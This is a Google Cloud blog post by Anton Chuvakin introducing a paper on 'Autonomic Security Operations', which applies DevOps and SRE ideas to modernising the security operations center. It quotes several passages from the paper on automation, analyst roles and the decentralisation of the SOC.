New Paper: “Autonomic Security Operations — 10X Transformation of the Security Operations Center”

By Anton Chuvakin, Head of Solutions Strategy at Google Cloud

It is with much excitement that we release a new paper about transforming your security operations, published under the Office of the CISO at Google Cloud.

This work is focused on our vision and lessons learned in building effective security operations for the future. We spent a lot of time thinking about what to call the new model. We decided on “Autonomic Security Operations” for the vision (the previous contender was “10X SOC”).

Now, when we say autonomic” here, we do not mean “without people” or “fully automated.” All of us here agree that it is quite impossible. When we think of autonomic security operations, we think of an approach that leverages automation, but also focuses on being agile, adaptive to rapidly changing environments, and the one that utilizes people with dramatically increased effectiveness.

While I want you to read our paper, let’s now think about two interesting and useful ideas from it.

One question that I’ve been trying to explore, such as in this podcast, is: we do know that DevOps and SRE approaches revolutionized how IT is managed and practiced. I’ve been thinking about what can possibly be a similar revolution in security and, more specifically, in security operations.

The answers, of course, are obvious. What is the “O” in SOC? Operations. What happens to operations in the DevOps model? It becomes fused with development, thus toil decreases, while automation increases. Less toil, but more code.

Naturally, we see the same start to slowly happen in good SOCs or detection teams (if you insist on being “SOCless”). In the SOC context, this is about detection engineering, detection as code and related concepts.

Just as naturally, and just as it happened in IT first, many people don’t like these changes. For example, the comments on this blog post indicate security teams don’t want anything “as code” because this means they have to code. But, it’s likely that Windows NT system administrators of the 1990s also did not want to become part of DevOps…

Next, what about the other part of the SOC, namely the “C”? Will SOC remain at the center of anything? Will it always be a crowded room with fancy monitors?

As we watched current events affect security operations, we learned that SOC as a big room, full of people, may in fact disappear. However, I’ve long argued that SOC is first a team that focuses on detecting threats and helping respond to them and so it will not vanish anytime soon. What if the future SOC would be a center in the same sense as “a center of excellence”, but not a central physical location anymore?

So, what happens if a SOC both becomes infused with DevOps approaches and stops being a centralized silo?

As you learn in our new paper on autonomic security operations, we are presenting this very vision of future security operations. Using the lessons from DevOps and SRE approaches, we propose that a security operations center would become less about operations and less of a center.

These changes are critical, if not to say truly necessary, to deal with the business, IT landscape and threats of the future. Below — and of course in the paper — you will see many examples of how we describe such transformed SOC and how you can take steps towards making your security operation center work that way.

So, please see a tiny subset of my favorite quotes from our paper:

  • Autonomic Security Operations is a combination of philosophies, practices, and tools that improve an organization’s ability to withstand security attacks through an adaptive, agile, and highly automated approach to threat management. “
  • “An unfortunate common theme of many cloud transformations is that the SOC requirements get deprioritized when organizations have tight timelines and budgets to drive their teams to the cloud. The reason being, most SOC teams are too busy fighting fires and don’t have the spare cycles to focus on adapting their use cases to cloud workloads and modernizing their own infrastructure.”
  • “To be 10 times more effective with the people component, your SOC cannot achieve this by increasing the personnel by a factor of 10. As of today, both threats and technology resources that need effective security are increasing at a much faster pace than people entering the workforce. […] It is absolutely impossible for most organizations to 10x their headcount in a SOC.”
  • ”At Google and across other industry-leading security operations teams, the role of an analyst is not simply to manage cases and perform tier-1 level work. Analysts are engineers, architects, project managers, and are empowered to be leaders of their subject matter focus. At such a SOC, the concept of Level 1 to Level 3 analysts is a thing of the past, rather, you should organize teams based on aligning skills to the use cases that fall under their purview.”
  • The SOC can only truly be 10X and transformative if it also has strong influence over the upstream elements of the security lifecycle. You can make a significant impact on the amount of alerts that get into your SOC if your team has a strong integration with your DevOps practice. A deep understanding of how infrastructure and applications are securely built, deployed, and managed across your organization paired with your ability to influence this design can only improve your ability to catch attackers at their earliest onset, or even better, prevent them from getting in entirely.”

But really, check out the paper here. You can also read about the related solution launch involving Chronicle, and watch a demo of Autonomic Security Operations here.